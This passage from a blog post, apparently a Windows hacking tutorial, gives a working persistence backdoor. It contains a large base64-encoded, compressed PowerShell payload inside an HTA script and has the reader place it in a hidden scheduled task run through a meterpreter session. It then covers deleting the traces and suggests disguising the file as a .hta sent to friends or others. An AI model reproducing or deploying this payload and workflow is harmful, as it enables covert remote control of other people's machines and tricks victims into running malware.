oAHIAdABmAGQATABFAEUAawBYAFYANQBjADYARwBXAGUANAA1AFQAdAA5ADgAMQBMAHoATgBTAGkAdwBNAGsAdABKAGIAZwBRAEoAZQBFAHYAWQBSAEwAaABIAEoAOQBlADMAOQA1AGgAbgB3AGwAZgBoAE4AcQBmAHoAVQB1AGEAMwBTAEoANgBFAEsAdAAwADUARQBkAFkATwBGAFgAVABnAE4AOABOAE0AaAA5AHgATQBFADEAMwBUAFEAawBUADYAMwAvADgAVQBaAGMAVwBwADYAMQBsADAALwBoAGMASQBsAHEASQBkAGIAYwBxAEcARQA2AGEAQQBhAFYAMQBTAGYAZwBxAGMAWQBlAGoAYQBvADMARgB1AGsAMwA4AFAAQwB1AHkARgBXAHQATwBTAFAAcgB1AHIARABsAE8AQwA3AFQAQwBWADIARAB0AEgAdAB1AFkAUgBWAGwAUQAxAEMAVQBJAEEAMwA0ADUAWgBtAFcAZQBDAHYAdQBBAHUASQBYADkAdgBWAGkASAA1AFQARABQAGYARABVAEkAYwBsAHkAQQBlAE4ATgBLADcANwBNAFkAaQA3AFcAMABwAEwAUQBoAC8AQwA0AHUARAB1ADUAdgB5AHAAUwBSAEIATQBNADkAdwAzAG0AMgBkAG4ARgArAFQAMwB4AGMATgBIAHMAbwBEAFMAaQArAHcAYQB1AGwAZQBJAFUAMwB4ADYAaAAvAFYAawBsADgAcQBnAFIAUwBRADUAWgBMAEQAYwBqAEQAUwB6AGoAdABMAEMAZwBwADMAcQB2AFcAcABlAGQASQBlAGYASQBrAGUAUABZAEoAaABNAEMALwB2AG4AbgA5ADUAdgBYAHEAbQBPAHYAUAA5AHYAbgBUAFYATQBQAHEAMQBXAEsAMwB4AG8AQgBOAEgARwBZAEYAMgBZAGwAOQBGAEoAUwBHAFkASQBNAFQAeABMAEsAOABnAG0AMQB0AGwASgBkAFkAVwBnAG8ATABUAHYAcABpAHUAUgBSAHEAbgA2ADgAYQBQADkAWgB1AEgAVQBWAEIARQBKAHYAWABYAFQAaABhAGUAQgBrAEoAbABxAEIAeQBTAEUAWQB0AHcAcgBPAHEAdwB5ADkAKwBYAEYAVgBkAHYAQwBJAHAANwBsAFkAcABTAG8AaAAvAEwAQgB6AHgASgBZAHIAeABpAHUASgBkAGgATQAyAGoAMgBCAFcAZwBFAHUAdQBIAEMAeAB4ADAATQBjAFUAaABZAHAAeQB6AGgAcgBCADQAcgBtAFkAawBoAEQAMwBxAGEAaQBXAGgAQQBjADUAVgBIADkASgBVAEEAQwByAEkAbwBQAFEAOQBtAEgAMABhAHgATABxAFYAMgBqAGcAQgBpAHYAYgA3AE8AcgBDACsAZwBuAEwARgBSACsAbABEAGkAVgBaAEgANwAzAHcAUABRAG4AVwBkAG8AcQBKAG8AQwBNAE0AUwArAHMAVgB2AEMAQwA1AEcARgBBAGMATgBRAFUAMABMAGMAcgBoAFMAUwA1AGIAdABsAHYAVgB2AGMATwAyAFMATQB1AEsAagBnAGgAMwBOAEwAYQBWAEgASQBnADgATwA5AFMAdwB0AFcARgA3ADYAawBEAFkASQBmAHUAUwB1AHMAVQA4AFEANQBWAHcAMABoAEIANABKAHMARgBhADUASgBEAHcANgByAHIALwBJAGgASQA0AG8ASgBXAGsASQBsAHUANABoAEUAMwBEAEMARwBYAEEAWgBMADQAWQBjAE0ARQBMAGkAcABhAGEATABtAFoAVwBzAEsAVQA1AEEAWQB0AGUAMwBKAGsAVQBoAGQATwBtAGgAMQBIAGUAMQBnADAASQBjADEASgA4AEIAUABKAGIAeQB2AG0ANAA1AEYAMABjAFMAbgBzAEMARABCAEwAcwAwAFkAdwAzAEIASQB6AG0ARAAvAHUAZQA4ADgAagBMADYATAA5ADYAZgA5AFAAMABlAGgANQA3AGoAUQB5AGIARQBZADMAcwBzAHQASQByAHgAcQBxADcANQBNAFMALwBJAEEAeQBjADcAQgBuAEkARwAwAFoAdAA1AGwAbQBpAG8AdwBPAGQAdABsACsAWABBAGoAZgBoAFcATgBrAGoAMwAvAGIAQwBiAFAAYQBqAHcARwBPAGEATgA0ADIAbgB1ADIASgB0AGIAZAB0AEMAbgByAHMAWABjAG0AVQBFAEcANAB5AGkAeQBTAE0AcwBLAFkAVgArAE4AagBYAEQASQBsAFAAVwBuADAAYQBqAFgAZAA3AHMAOQBOAGUAOQB1AG8ANQBWAHEARgBaAGIAUgAwAHkAcQBuAHAAYQBsACsAagAvAHoAbQA5AGIAWAB4AEcAUABTAEkAUABuAEQAdQB0AHAAWQBhAGEARQBrADQARABXAGYANgB4AGgAcABHAFUAdwBzAGMANgBZAFAAUQBDAHUARgBmAHMAeQBKAGYAVQArAFoASwBxAEMAbQBtAFAAbgBDADEAeQBDAEMASwBHAHIAcABPAHoAMgBtADMANQBwAGIAYwBvAFIAcAA1AGMAQwAxAFgANwBVADAAZQAvAFQAMwA2AE0AZAByAHQAMwBuAFEANwBVAHEALwBzAHYAaABxAFoAMQA0AEgAWgBPAGoATgAzACsAagBIAFgAbgA4AGUAWABnADYANgB4ADIALwB0ADgANwA4AHcASwBnAHgAagBnAHgAegBCAG4AagBoAGYAaABpAGIAZgBXAEoAbwBZADUAZAA3AHkAMQBGAFoANQBzAFEAcwBjAGIAeQBHADAAegAwAHUARABjAEkAdAB2AEIAMgBwAFgAaABhAGIAWAA2ADkAMgBuAHcAWQBOAFAATwBnAHcAMQB3AEgAVwAvAGUASgAzAGgAdQBoAGIAZwBLAFYAVQBkAFYAMwBWAGwASwAzAGQAdQBOAEQAbgBIAE0ANwAxAHYAcwBkAHEASwBZAFkAegBpAEwAUgAxAGEANgBkAFcANwBYAGQAbABEAE4AZQB2AEkASAB6AHkAWgA0AG4AYQBtAE8AbwBhAG8AbQBoAFkAWgBNAFYATABUAHAAeQBxADEASgA5AHMAbgB4ADMAagB0AGoAUQA5AGwAVwBZADIAVwA3AE0AZQA3AGsAagBVAEgANgBtAC8AagB3AFAANwA0ADgAUAB3AC8AbABWAFgAcwBvAGUANgA2AFYAOQBsAEMAawBBAGQANgBxADMANAA1AEoALwB3AFQAdQBFAHUAUQBwAHMANQBYAHMAYwBmADcAMABPAEoAVQBmADAAaQBrADkANwA5AHMANwBUAGkARQBlAEIAMwBRAEkANQB3AHkARgBOADYAQwAzADEAMQBGAFoAYQBrADEAbAAyAFEAdgBsAFUARgAxAFIAegB3AG8ANwBUAGoAagBOADAAagBNAFUAZwArADEASgBxAEEASgBDAGkAQgBGAHkAdgBlAHAAYgB0AGcAOQBZAEsAWQBuAEgASgAxAE8ANQBOAFEAWQA4AFMAdABMAGYASwBoAHgAcgAwAHUAKwBBAHYAYgBQADQAQgBaAHQAdQBCAE4AdwBHAGMANgBSAHEASABJAGMAMgB1AGMAegBVAFMAWAB4ADUAcgBsAGUAZABvAFEAMQB4AGUAQwAyAHcAbQBYAHIAbABhAE4ASQBEAG0ANABDADUAagBEAHUAYwBaAHMAaAB2ADEAOQBYAFQAUwA5AGUAYQBuAGcAVwAzAE4ANQBwADgARQBzAHgAUQBxAE0AMQBkAGYANgBWADMAQgBoAFAAaQAzAGMAdgBlAFcAOQA0AEMAMABBAE0AMQBlAHEAZQBWAFQAMgByADcAUgB6AFAASgBSAG4AawBSAEkAUQBvADEARAA3AFAAbQArAEoAbwB4AHMAOQB3ADgARABKAEIAaABSAHIAaQBHAEsATwA0ACsARwBtAEsAYwBwADUAagBDADAASQBXAHgAZgBPAHgAVgBsAGQATABNADUAKwBPAEwAagB4AHEAWQBuAFAAdAA1AHQAbwBSAFgAegBSAGkAVwA3ADgANQBlAFgARQBuAEMAbwA2AEQAMABiAGEAZwBkAGoAeQA0AHUANQBnAEEAUwBtAHQAKwBQAG0AdwBPAGMAaABpAHgAcQBLAE4AdAAzAGkAZwBJAHoAUwB0AG0AMgBGAFEAagB4ADUAOABQAFMAcwAzAFUAbABnAHEARQBHAG4AMwBBADcAVgB2AFoAMgA2AGMANgB1AHgATgA4AEcAdABlADMAcwAvADIAWABxADgAQQBhAEsANABDAC8ANABGADYAYQArAG4AZgAzAEQANwBVACsAeABwAHoAVAAyADAAVAA0ADcALwB2ADcAZwBsADgAagA4ADUAYwBnAG4AaQBEAEMAUQBkAE8ARQBkAFMAdgBGACsAaABMADkASQB3AEsARQBxAG4AbgB6AGYAYgBHAGUAUQA4ADkAWABoADQAZAArAFgAMQB5AFUANwB2AFkASwBQAG4AcgA4AEIAaQBIADcAeQBHAGMAYwBLAEEAQQBBAD0AJwAnACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA=="</span>,<span class="number">0</span></div><div class="line">      <span class="keyword">Exit</span> <span class="keyword">For</span></div><div class="line">    <span class="keyword">End</span> <span class="keyword">If</span></div><div class="line">  <span class="keyword">Next</span></div><div class="line">  window.close()</div><div class="line">&lt;/script&gt;</div></pre></td></tr></table></figure>
<p>There is a tag named <em>Arguments</em> to fill In the <em>test.xml</em>. You must know what to if you are clever enough.</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line"><span class="tag">&lt;<span class="name">Exec</span>&gt;</span></div><div class="line"></div><div class="line">      <span class="tag">&lt;<span class="name">Command</span>&gt;</span>powershell.exe<span class="tag">&lt;/<span class="name">Command</span>&gt;</span>  </div><div class="line">      <span class="tag">&lt;<span class="name">Arguments</span>&gt;</span></div><div class="line">        -nop -w hidden -e [payload: paste the long base64 encode code above here]</div><div class="line">  	  <span class="tag">&lt;/<span class="name">Arguments</span>&gt;</span></div><div class="line"></div><div class="line"><span class="tag">&lt;/<span class="name">Exec</span>&gt;</span></div></pre></td></tr></table></figure>
<p>Now we have the backdoor done.</p>
<h4 id="Task-Done"><a href="#Task-Done" class="headerlink" title="Task Done"></a>Task Done</h4><p>We can upload the backdoor to the target machine with the <em>meterpreter</em> session and delete the timing task once we created the task successfully. Of course, don’t forget the open the <em>listener and delete the </em>test.xml*</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">del /f /q test.xml</div><div class="line">schtasks /delete /tn test</div></pre></td></tr></table></figure>
<h3 id="Plus"><a href="#Plus" class="headerlink" title="Plus"></a>Plus</h3><p>What about the hta? It’s easy to change the <em>test.xml</em> to <em>test.hta</em>. You can send the <em>test.hta</em> to your friend or others with a little adjustment of the extension.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">deexe.hta</div><div class="line">death.exe</div></pre></td></tr></table></figure>
<p>Happy Hacking</p>
<h3 id="Reference"><a href="#Reference" class="headerlink" title="Reference"></a>Reference</h3><ol>
<li><a href="http://www.freebuf.com/sectool/90362.html" target="_blank" rel="external">Two guns: Powershell and HTA</a></li>
<li><a href="https://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/" target="_blank" rel="external">Running Code From A Non-Elevated Account At Any Time</a></li>
<li><a href="https://raw.githubusercontent.com/Ridter/Pentest/master/backdoor/Persistent/Schtasks-Backdoor.ps1" target="_blank" rel="external">Schtasks-backdoor</a></li>
</ol>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Windows/" rel="tag"># Windows</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017-12-03-Meterpreter-Basics/" rel="next" title="Meterpreter Basics">
                <i class="fa fa-chevron-left"></i> Meterpreter Basics
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017-12-06-Locale-and-Crontab-on-Linux/" rel="prev" title="Locale and Crontab on Linux">
                Locale and Crontab on Linux <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      <div id="lv-container" data-id="city" data-uid="MTAyMC8yODY0MC81MjEx"></div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Ꭰ</p>
              <p class="site-description motion-element" itemprop="description">Me. a lazy person</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">46</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">10</span>
                  <span class="site-state-item-name">categories</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">43</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          <div class="links-of-author motion-element">
            
          </div>

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://suroot.cn" title="c0rpse" target="_blank">c0rpse</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.th1s.cn" title="th1s" target="_blank">th1s</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://jkme.github.io" title="jkme" target="_blank">jkme</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#HTA"><span class="nav-number">1.</span> <span class="nav-text">HTA</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Reverse-Shell-By-PowerShell"><span class="nav-number">2.</span> <span class="nav-text">Reverse Shell By PowerShell</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Generate-PS1-File"><span class="nav-number">2.1.</span> <span class="nav-text">Generate PS1 File</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Listener"><span class="nav-number">2.2.</span> <span class="nav-text">Listener</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Get-Shell"><span class="nav-number">2.3.</span> <span class="nav-text">Get Shell</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Keep-Permanent-Backdoor"><span class="nav-number">3.</span> <span class="nav-text">Keep Permanent Backdoor</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Query-Timing-Tasks-On-Windows"><span class="nav-number">3.1.</span> <span class="nav-text">Query Timing Tasks On Windows</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Create-Timing-Tasks"><span class="nav-number">3.2.</span> <span class="nav-text">Create Timing Tasks</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Export-Timing-Task-And-Backdoor"><span class="nav-number">3.3.</span> <span class="nav-text">Export Timing Task And Backdoor</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Task-Done"><span class="nav-number">3.4.</span> <span class="nav-text">Task Done</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Plus"><span class="nav-number">4.</span> <span class="nav-text">Plus</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Reference"><span class="nav-number">5.</span> <span class="nav-text">Reference</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2017 &mdash; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Ꭰ</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a></div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.3"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.3"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.3"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.3"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.3"></script>



  


  




	





  





  
    <script type="text/javascript">
      (function(d, s) {
        var j, e = d.getElementsByTagName(s)[0];
        if (typeof LivereTower === 'function') { return; }
        j = d.createElement(s);
        j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
        j.async = true;
        e.parentNode.insertBefore(j, e);
      })(document, 'script');
    </script>
  












  





  

  

  

  
  

  

  

  

</body>
</html>
